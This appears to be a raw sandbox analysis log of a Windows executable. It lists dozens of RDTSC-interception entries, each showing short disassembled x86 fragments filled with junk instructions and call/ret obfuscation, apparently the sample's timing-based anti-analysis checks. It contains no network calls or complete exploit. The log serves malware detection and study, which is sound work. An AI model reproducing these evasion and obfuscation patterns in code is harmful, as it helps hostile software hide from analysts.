Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F444E2 second address: F44516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FB8E4E1A51Ch 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F44516 second address: F44524 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FB8E4E1E3B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F44A5E second address: F44A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F44A64 second address: F44A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jnl 00007FB8E4E1E3CAh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F44D11 second address: F44D1B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F44D1B second address: F44D25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB8E4E1E3B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4E056 second address: F4E05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4E05E second address: F4E07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4D65D second address: F4D699 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB8E4E1A521h 0x00000008 js 00007FB8E4E1A516h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jmp 00007FB8E4E1A521h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4D914 second address: F4D918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4D918 second address: F4D91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4D91E second address: F4D93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB8E4E1E3BEh 0x0000000d js 00007FB8E4E1E3B6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4D93A second address: F4D940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4DEB3 second address: F4DEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FB8E4E1E3CFh 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FB8E4E1E3C7h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4DEDD second address: F4DEE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F4DEE5 second address: F4DEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F515C4 second address: F515DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A51Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F515DB second address: F51601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C2h 0x00000009 popad 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jbe 00007FB8E4E1E3C4h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F51601 second address: F51622 instructions: 0x00000000 rdtsc 0x00000002 je 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007FB8E4E1A51Dh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F51622 second address: F5166D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB8E4E1E3C2h 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FB8E4E1E3B8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push 6DE2B523h 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e jl 00007FB8E4E1E3B6h 0x00000034 pop edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F51A01 second address: F51A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FB8E4E1A516h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F51A96 second address: F51A9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F51A9F second address: F51AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F51C08 second address: F51C12 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5233A second address: F52350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB8E4E1A51Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F52739 second address: F52757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1E3BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FB8E4E1E3C4h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F52757 second address: F5275B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5275B second address: F5277B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D2E73h], ebx 0x0000000d mov esi, 1F2717BDh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB8E4E1E3BBh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5455B second address: F54578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FB8E4E1A516h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F53D2C second address: F53D37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FB8E4E1E3B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F54578 second address: F5457C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5461A second address: F5461E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5461E second address: F54622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F54622 second address: F54628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F550D1 second address: F550FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FB8E4E1A516h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FB8E4E1A52Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F550FF second address: F55106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F55B22 second address: F55B26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F55B26 second address: F55BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB8E4E1E3BBh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FB8E4E1E3B8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FB8E4E1E3B8h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 jmp 00007FB8E4E1E3C8h 0x0000004a push 00000000h 0x0000004c mov si, dx 0x0000004f call 00007FB8E4E1E3C5h 0x00000054 push edi 0x00000055 jg 00007FB8E4E1E3B6h 0x0000005b pop edi 0x0000005c pop esi 0x0000005d xchg eax, ebx 0x0000005e pushad 0x0000005f jmp 00007FB8E4E1E3C9h 0x00000064 push eax 0x00000065 push edx 0x00000066 push edx 0x00000067 pop edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5713B second address: F5713F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5713F second address: F57145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F57145 second address: F571CE instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1A522h 0x00000008 jmp 00007FB8E4E1A51Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FB8E4E1A518h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FB8E4E1A518h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 00000016h 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 jmp 00007FB8E4E1A527h 0x0000004b push 00000000h 0x0000004d cld 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jno 00007FB8E4E1A516h 0x00000058 jmp 00007FB8E4E1A521h 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F571CE second address: F571E4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB8E4E1E3B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FB8E4E1E3B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5952F second address: F595E4 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB8E4E1A522h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007FB8E4E1A52Ch 0x00000011 jmp 00007FB8E4E1A526h 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FB8E4E1A518h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 stc 0x00000032 sub edi, dword ptr [ebp+1244AC1Ch] 0x00000038 mov dword ptr [ebp+122D1AF7h], edi 0x0000003e push 00000000h 0x00000040 mov ebx, dword ptr [ebp+122D2B9Bh] 0x00000046 mov ebx, dword ptr [ebp+122D29E3h] 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push ecx 0x00000051 call 00007FB8E4E1A518h 0x00000056 pop ecx 0x00000057 mov dword ptr [esp+04h], ecx 0x0000005b add dword ptr [esp+04h], 00000019h 0x00000063 inc ecx 0x00000064 push ecx 0x00000065 ret 0x00000066 pop ecx 0x00000067 ret 0x00000068 mov bl, EEh 0x0000006a xchg eax, esi 0x0000006b push esi 0x0000006c jmp 00007FB8E4E1A526h 0x00000071 pop esi 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 popad 0x00000078 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F595E4 second address: F595E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5B42E second address: F5B47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007FB8E4E1A518h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000017h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 mov edi, dword ptr [ebp+122D37B2h] 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a xor dword ptr [ebp+122D2747h], ecx 0x00000030 mov di, 565Ah 0x00000034 push eax 0x00000035 pushad 0x00000036 jmp 00007FB8E4E1A51Dh 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5B47A second address: F5B47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5D3AA second address: F5D3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5E3E5 second address: F5E3EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5E3EB second address: F5E451 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB8E4E1A51Ch 0x00000008 jns 00007FB8E4E1A516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 add bx, 1555h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FB8E4E1A518h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D27DEh], edx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007FB8E4E1A518h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000019h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov edi, edx 0x00000056 xchg eax, esi 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5E451 second address: F5E455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5E455 second address: F5E45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5F531 second address: F5F547 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB8E4E1E3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FB8E4E1E3B8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5F547 second address: F5F59C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB8E4E1A51Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FB8E4E1A518h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 jns 00007FB8E4E1A51Ch 0x0000002b push 00000000h 0x0000002d mov ebx, 0C96456Dh 0x00000032 push 00000000h 0x00000034 mov edi, 43B8C128h 0x00000039 movzx edi, ax 0x0000003c push eax 0x0000003d push esi 0x0000003e push eax 0x0000003f push edx 0x00000040 jnl 00007FB8E4E1A516h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5F59C second address: F5F5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F60527 second address: F605B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edx 0x0000000c jmp 00007FB8E4E1A51Dh 0x00000011 popad 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D2FAEh], ebx 0x00000019 mov ebx, dword ptr [ebp+12464A61h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007FB8E4E1A518h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b mov ebx, eax 0x0000003d mov ebx, eax 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push esi 0x00000044 call 00007FB8E4E1A518h 0x00000049 pop esi 0x0000004a mov dword ptr [esp+04h], esi 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc esi 0x00000057 push esi 0x00000058 ret 0x00000059 pop esi 0x0000005a ret 0x0000005b mov dword ptr [ebp+122D2747h], ecx 0x00000061 xchg eax, esi 0x00000062 push ebx 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FB8E4E1A51Eh 0x0000006a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F605B0 second address: F605D2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB8E4E1E3C8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F61510 second address: F61526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB8E4E1A522h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F643FB second address: F6440D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB8E4E1E3B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FB8E4E1E3B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F6440D second address: F64411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F649CB second address: F649CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F58484 second address: F5848E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5C5A5 second address: F5C5A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5D581 second address: F5D587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5E641 second address: F5E646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F5E646 second address: F5E64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F6267C second address: F62680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F6171C second address: F61737 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB8E4E1A518h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007FB8E4E1A528h 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007FB8E4E1A516h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F61737 second address: F6173B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F67806 second address: F67822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB8E4E1A528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F66A22 second address: F66A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB8E4E1E3B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F66AD4 second address: F66AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F67A21 second address: F67A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\vUcZzNWkKc.exe	RDTSC instruction interceptor: First address: F67A25 second address: F67A32 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB8E4E1A516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
